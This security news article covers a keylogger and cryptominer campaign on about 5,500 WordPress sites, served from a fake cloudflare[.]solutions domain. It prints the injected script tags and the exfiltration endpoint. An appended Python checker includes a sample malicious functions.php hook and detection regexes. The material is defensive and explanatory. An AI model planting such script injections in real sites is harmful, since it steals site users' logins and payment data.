Keylogger found on nearly 5,500 Infected WordPress websites




Nearly 5,500 WordPress sites are infected with a malicious script that logs keystrokes and sometimes loads an in-browser cryptocurrency miner.

The malicious script is loaded from the cloudflare[.]solutions domain, which has no connection to the real Cloudflare, and records whatever users type into form fields as soon as focus leaves an input field.

The script is loaded on both a site's frontend and backend, which means it can capture the username and password entered when logging into the site's admin panel.




The script is also dangerous when running on the frontend: while on most WordPress sites the only place it could steal user data is the comment fields, some WordPress sites are configured to work as online stores as well. In those cases, the hackers can steal credit card data and other personal information of the site's users.

These attacks are not new: the security firm Sucuri has detected three different malicious scripts hosted on the cloudflare[.]solutions domain.

The first attack was spotted in April, when the hackers used a malicious JavaScript file. In November, the same group changed tactics and began loading malicious scripts disguised as fake jQuery and Google Analytics JavaScript files that were actually copies of the Coinhive cryptocurrency miner. By November 22, this campaign had been spotted on 1,833 sites.

In the latest series of attacks, the hackers have kept the cryptojacking script but have also added the keylogger.

The script is active on nearly 5,500 WordPress sites

According to PublicWWW, this malicious version of the script is currently active on 5,496 sites.

The two malicious scripts that are known to load the keylogger are:

<script type='text/javascript' src='hxxp://cloudflare[.]solutions/ajax/libs/reconnecting-websocket/1.0.0/reconnecting-websocket.js'></script>

<script type='text/javascript' src='hxxp://cloudflare[.]solutions/ajax/libs/cors/cors.js'></script>

The stolen data is sent to wss://cloudflare[.]solutions:8085/.

If your site is infected, be aware that the malicious code resides in the functions.php file of the WordPress theme. Remove the add_js_scripts function and every add_action call that references add_js_scripts.

Since it is a keylogger, all WordPress passwords are effectively compromised, so the next mandatory step of the cleanup is changing them.
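As an added example (not code from the article or from Sucuri), the checker below turns the indicators above into a repeatable check a site owner can run: it looks for script tags loading from cloudflare[.]solutions in a rendered page, and for the add_js_scripts function plus any add_action call referencing it in a theme's functions.php. The page fragment and the functions.php contents are constructed samples; the domain regex accepts both the raw and the defanged spelling so the check also works on sanitised copies.

```python
import re
from typing import Dict, List

# Constructed sample: part of a rendered WordPress page carrying the two
# injected script tags named in the article (defanging kept as written).
SAMPLE_HTML = """
<html><head>
<script type='text/javascript' src='https://example.com/wp-includes/js/jquery/jquery.js'></script>
<script type='text/javascript' src='hxxp://cloudflare[.]solutions/ajax/libs/reconnecting-websocket/1.0.0/reconnecting-websocket.js'></script>
<script type='text/javascript' src='hxxp://cloudflare[.]solutions/ajax/libs/cors/cors.js'></script>
</head><body></body></html>
"""

# Constructed sample of an infected theme functions.php with the shape the
# article describes: an add_js_scripts function plus add_action hooks for it.
SAMPLE_FUNCTIONS_PHP = """<?php
function add_js_scripts() {
    echo "<script type='text/javascript' src='hxxp://cloudflare[.]solutions/ajax/libs/cors/cors.js'></script>";
}
add_action('wp_head', 'add_js_scripts');
add_action('admin_head', 'add_js_scripts');
add_action('login_head', 'add_js_scripts');
"""

# Indicators taken from the article. The domain matches in raw and defanged form.
BAD_DOMAIN_RE = re.compile(r"cloudflare(?:\.|\[\.\])solutions", re.IGNORECASE)
SCRIPT_SRC_RE = re.compile(r"<script[^>]*\ssrc=['\"]([^'\"]+)['\"]", re.IGNORECASE)
FUNC_DEF_RE = re.compile(r"function\s+add_js_scripts\s*\(")
HOOK_RE = re.compile(r"add_action\s*\([^)]*add_js_scripts[^)]*\)")


def find_malicious_script_tags(html: str) -> List[str]:
    """Return the src of every <script> tag that loads from the bad domain."""
    return [src for src in SCRIPT_SRC_RE.findall(html) if BAD_DOMAIN_RE.search(src)]


def find_infected_theme_lines(php_source: str) -> Dict[str, List[int]]:
    """Return 1-based line numbers of the add_js_scripts definition and of
    each add_action call that references it, so they can be removed."""
    hits: Dict[str, List[int]] = {"function_def": [], "add_action": []}
    for lineno, line in enumerate(php_source.splitlines(), start=1):
        if FUNC_DEF_RE.search(line):
            hits["function_def"].append(lineno)
        if HOOK_RE.search(line):
            hits["add_action"].append(lineno)
    return hits


def is_infected(html: str, php_source: str) -> bool:
    """True if either the rendered page or the theme shows an indicator."""
    theme = find_infected_theme_lines(php_source)
    return bool(find_malicious_script_tags(html)) or bool(theme["function_def"]) or bool(theme["add_action"])


if __name__ == "__main__":
    print("script tags:", find_malicious_script_tags(SAMPLE_HTML))
    print("theme lines:", find_infected_theme_lines(SAMPLE_FUNCTIONS_PHP))
    print("infected:", is_infected(SAMPLE_HTML, SAMPLE_FUNCTIONS_PHP))
```

To use it on a real site, feed find_malicious_script_tags the HTML fetched from the frontend and the login page, and find_infected_theme_lines the contents of the active theme's functions.php; the reported line numbers are the ones to delete before rotating every WordPress password.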
